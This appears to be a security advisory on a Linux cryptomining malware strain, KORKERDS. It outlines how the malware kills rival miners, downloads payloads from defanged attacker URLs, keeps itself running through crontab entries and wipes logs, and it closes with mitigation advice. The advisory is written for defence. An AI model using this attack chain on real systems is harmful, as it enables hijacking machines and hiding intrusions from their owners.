Linux Platform is being targeted by a new malware strain that installs the XMR-Stak Cryptonight cryptocurrency miner. Additionally, it also searches for other Linux malware and coin miners already present on the compromised machine, and kills them to maximize its own cryptocurrency mining.
This KORKERDS variant downloads the universal Stratum XMR-Stak pool miner which uses the system’s CPU or GPU to mine Cryptonight currencies. Following activities have also been observed:
Function B kills previously installed malware, coin miners, and all related services referenced to an accompanying malware. It also creates new directories, ﬁles, and stops processes with connections to identiﬁed IP addresses. Function D downloads the coin miner binary from hxxp://yxarsh[.]shop/64 and runs it. Function C downloads a script from hxxp://yxarsh[.]shop/0, saves it to /usr/local/bin/dns ﬁle, and creates a new crontab to call this script at 1 a.m. It also downloads hxxp://yxarsh[.]shop/1.jpg and puts it in diﬀerent crontabs.
The malware will also make sure to clear system logs to erase its traces, and will also achieve persistence avoiding removal after reboots or deletion with the help of the implanted crontab ﬁles. The second stage of the infection originates from multiple IP cameras and web services via the TCP port 8161, from domains where the attackers have stored the crontab ﬁle which launches the main stage of the malware attack.
Other unspeciﬁed impact is also possible
Indicators of Compromise
Malware Hash (MD5/SHA1/SH256)
Block the threat indicators at their respective controls.
Keep all Linux systems up-to-date with the latest patches against all vulnerabilities, as Linux is seen to be targeted by many threat actors.